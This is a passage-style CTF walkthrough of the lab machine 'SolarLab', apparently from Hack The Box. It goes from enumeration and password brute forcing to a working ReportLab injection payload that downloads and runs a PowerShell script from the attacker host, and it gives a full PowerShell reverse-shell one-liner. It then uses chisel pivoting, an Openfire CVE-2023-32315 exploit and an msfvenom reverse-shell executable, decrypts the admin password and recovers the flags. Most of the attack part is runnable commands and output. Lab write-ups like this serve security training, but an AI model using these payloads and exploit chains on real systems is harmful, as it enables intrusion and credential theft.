TCP Scan

> TARGET=10.129.61.108 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 nginx 1.24.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
6791/tcp open  http          syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • add entries
echo '10.129.61.108    solarlab.htb    report.solarlab.htb' >> /etc/hosts

enum

  • enum4linux
> enum4linux solarlab.htb
[x]
  • subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://solarlab.htb/" -H "Host: FUZZ.solarlab.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
  • dirsearch
dirsearch -u http://solarlab.htb/
[17:22:14] 403 -  555B  - /assets/
[17:22:14] 301 -  169B  - /assets  ->  http://solarlab.htb/assets/
[17:22:42] 301 -  169B  - /images  ->  http://solarlab.htb/images/
[17:22:42] 403 -  555B  - /images/
  • smb
smbclient -N -L \\solarlab.htb
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

smbclient -N //solarlab.htb/Documents
  • passwords found in details-file.xlsx
Alexander.knight@gmail.com	  al;ksdhfewoiuh
KAlexander	                  dkjafblkjadsfgl
Alexander.knight@gmail.com	  d398sadsknr390
blake.byte	                  ThisCanB3typedeasily1@
AlexanderK	                  danenacia9234n
ClaudiaS	                  dadsfawe9dafkn

report.solarlab.htb:6791

  • guess work needed to login using the above passwords file, blakeb:ThisCanB3typedeasily1@
hydra -C creds.txt report.solarlab.htb -s 6791 http-post-form "/login:username=^USER^&password=^PASS^:F=not"
[x]
  • generate a leaverequest at http://report.solarlab.htb:6791/leaveRequest, inspect the pdf
> strings output.pdf
% ReportLab generated PDF document -- digest (http://www.reportlab.com)
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.88/shell.ps1")') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
  • travelApprovalForm can be used for RCE, try the above payload, setup reverse shell
$client = New-Object System.Net.Sockets.TCPClient("ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • request payload
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.88/shell.ps1\')') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
  • get user flag
PS C:\Users\blake\desktop> type user.txt
f97f5b91b4a9b1a368805946dc7c36ac

root

  • found a db file
PS C:\users\blake\documents\app\reports\instance> ls


    Directory: C:\users\blake\documents\app\reports\instance


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/17/2023  12:11 PM          12288 users.db
  • a small file, encode the file with base64 for transfer
$content = Get-Content -Path 'users.db' -Encoding Byte
$base64 = [Convert]::ToBase64String($content)
$base64 | Set-Content -Path 'output.txt'
Get-Content -Path 'output.txt'
  • get pass for alexanderk:HotP!fireguard
sqlite> select * from user;
1|BlakeB|BlakeB
2|ClaudiaS|ClaudiaS
3|AlexanderK|ClaudiaS
4|blakeb|ThisCanB3typedeasily1@
5|claudias|007poiuytrewq
6|alexanderk|HotP!fireguard
  • there is an instance of openfire running on 9090
> netstat -ano
Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5976
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       364
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:6791           0.0.0.0:0              LISTENING       5976
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       532
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       316
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1544
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       652
  TCP    10.129.61.108:139      0.0.0.0:0              LISTENING       4
  TCP    10.129.61.108:55186    10.10.14.88:4444       ESTABLISHED     5324
  TCP    127.0.0.1:5000         0.0.0.0:0              LISTENING       5924
  TCP    127.0.0.1:5222         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5223         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5262         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5263         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5269         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5270         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5275         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:5276         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:7070         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:7443         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       2988
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       2988
  • prepare chisel for pivoting
PS C:\users\blake\desktop> curl http://10.10.14.88/chisel.exe -o chisel.exe


# On Kali
> chisel server -p 9999 --reverse
# update /etc/proxychains.conf
# comment out `proxy_dns` for nmap to work
socks5 127.0.0.1 <sock-port>

# On Pivot
# for specific port forwarding
.\chisel client --max-retry-count=1 10.10.14.88:9999 R:9090:localhost:9090
> python3 CVE-2023-32315.py -t http://localhost:9090
Successfully retrieved JSESSIONID: node01bx31xpd0ogwb1hk51dnprk3is2.node0 + csrf: CO5C3JDciafMtKn
User added successfully: url: http://localhost:9090 username: nnf2la password: 0eojze
  • follow the instruction on the reademe to upload a plugin for RCE
  • create a reverse shell and upload to c:\users\public\
> sfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.88 LPORT=5555 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

# call the shell on the plugin page
> c:\users\public\shell.exe

> rlwrap nc -vnlp 5555
listening on [any] 5555 ...
connect to [10.10.14.88] from (UNKNOWN) [10.129.61.108] 55285
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Openfire\bin>whoami
whoami
solarlab\openfire
  • find embedded-db in openfire directory
> C:\Program Files\Openfire\embedded-db>type openfire.script
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
> ava OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
  • admin password: ThisPasswordShouldDo!@
> $SecPassword = ConvertTo-SecureString 'ThisPasswordShouldDo!@' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
> $session = New-PSSession -Credential $Cred
> Invoke-Command -Session $session -scriptblock { type c:\users\administrator\desktop\root.txt }

3d5d56bc9bdffdf24e85212c1387503d

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack